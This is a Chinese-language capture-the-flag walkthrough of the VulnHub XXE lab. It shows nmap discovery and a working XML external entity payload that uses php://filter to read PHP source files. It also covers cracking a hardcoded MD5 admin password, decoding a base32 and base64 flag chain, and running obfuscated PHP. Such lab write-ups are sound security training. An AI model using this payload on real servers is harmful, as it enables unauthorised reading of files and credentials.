靶场网址:https://www.vulnhub.com/?q=xxe
靶场环境下载:https://download.vulnhub.com/xxe/XXE.zip
1.利用nmap扫出目标靶机ip等信息
靶场环境下载、解压并安装后,并不知道靶机的账号和密码信息,因为和kali主机是在同一网段,那么可以考虑用nmap知道靶机的ip和其他信息,结果如下:
2.提取关键信息并利用
直接访问网页xxe目录(有登录信息)
随便输账号密码bp抓包
可知为xml数据格式,接下来对它进行攻击
读取xxe.php的信息
payload:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">
]>
<root><name>&sp;</name><password>hj</password></root>
将框框中的信息进行base64解密(最后的not not available!不要 ),结果如下:
没什么很重要的信息,那么把xxe.php改为admin.php,读取admin.php的信息:
进行base64解码,解码得到的信息如下:
<?php
session_start();
?>
<html lang = "en">
<head>
<title>admin</title>
<link href = "css/bootstrap.min.css" rel = "stylesheet">
<style>
body {
padding-top: 40px;
padding-bottom: 40px;
background-color: #ADABAB;
}
.form-signin {
max-width: 330px;
padding: 15px;
margin: 0 auto;
color: #017572;
}
.form-signin .form-signin-heading,
.form-signin .checkbox {
margin-bottom: 10px;
}
.form-signin .checkbox {
font-weight: normal;
}
.form-signin .form-control {
position: relative;
height: auto;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
padding: 10px;
font-size: 16px;
}
.form-signin .form-control:focus {
z-index: 2;
}
.form-signin input[type="email"] {
margin-bottom: -1px;
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
border-color:#017572;
}
.form-signin input[type="password"] {
margin-bottom: 10px;
border-top-left-radius: 0;
border-top-right-radius: 0;
border-color:#017572;
}
h2{
text-align: center;
color: #017572;
}
</style>
</head>
<body>
<h2>Enter Username and Password</h2>
<div class = "container form-signin">
<?php
$msg = '';
if (isset($_POST['login']) && !empty($_POST['username'])
&& !empty($_POST['password'])) {
if ($_POST['username'] == 'administhebest' &&
md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
$_SESSION['valid'] = true;
$_SESSION['timeout'] = time();
$_SESSION['username'] = 'administhebest';
echo "You have entered valid use name and password <br />";
$flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";
echo $flag;
}else {
$msg = 'Maybe Later';
}
}
?>
</div> <!-- W00t/W00t -->
<div class = "container">
<form class = "form-signin" role = "form"
action = "<?php echo htmlspecialchars($_SERVER['PHP_SELF']);
?>" method = "post">
<h4 class = "form-signin-heading"><?php echo $msg; ?></h4>
<input type = "text" class = "form-control"
name = "username"
required autofocus></br>
<input type = "password" class = "form-control"
name = "password" required>
<button class = "btn btn-lg btn-primary btn-block" type = "submit"
name = "login">Login</button>
</form>
Click here to clean <a href = "adminlog.php" tite = "Logout">Session.
</div>
</body>
</html>
分析得到账号和密码:
if ($_POST['username'] == 'administhebest' &&
md5($_POST['password']) ==
'e6e061838856bf47e1de730719fb2609') {
密码为MD5加密,在线网站解密(其原理其实也是跑字典)试试看能不能解:
成功破解了,可以看到密码为:admin@123
转到http://192.168.10.6/xxe/admin.php(至于为什么转到这登录,是因为账号密码读取的文件的绝对路径为/xxe/admin.php)
进行登录,
点击"Flag"得到下面信息:
继续读flagmeout.php文件(因为在根目录下,注意加./)
进行base64解密后得到的结果为:
<?php
$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";
echo $flag;
?>
JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5
这串代码为base32加密,在线网站进行解码:
解码结果为base64编码:L2V0Yy8uZmxhZy5waHA=
,再用bp进行解码:
得到结果为/etc/.flag.php,继续用bp读取:
再base64解码:
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Ã=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Ã[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Ã.$Â.$Ã.$___.$Ã.$À.$Ã.$___.$Ã.$À.$È.$___.$Ã.$À.$Ã.$___.$Ã.$Â.$Ã.$___.$Ã.$Â.$À.$___.$Ã.$É.$Ã.$___.$Ã.$É.$À.$___.$Ã.$É.$À.$___.$Ã.$Ä.$Æ.$___.$Ã.$Ã.$É.$___.$Ã.$Æ.$Ã.$___.$Ã.$È.$Ã.$___.$Ã.$Ã.$É.$___.$Ã.$È.$Ã.$___.$Ã.$Æ.$É.$___.$Ã.$Ã.$É.$___.$Ã.$Ä.$Æ.$___.$Ã.$Ä.$Ã.$___.$Ã.$È.$Ã.$___.$Ã.$É.$Ã.$___.$Ã.$É.$Æ.'"');$__($_);
解码后发现看不懂,但知道这是.php文件,那么可能是php代码,知道个在线网站运行一下:
执行结果为(xxe_is_so_easy):
至此,本题成功过关!!撒花!!!
整个大致过程:
扫描IP及端口->扫描探针目录->抓包探针xxe安全->利用xxe读取源码->
flag指向文件->base32 64解密->php运行->flag
说实话,还是比较绕的。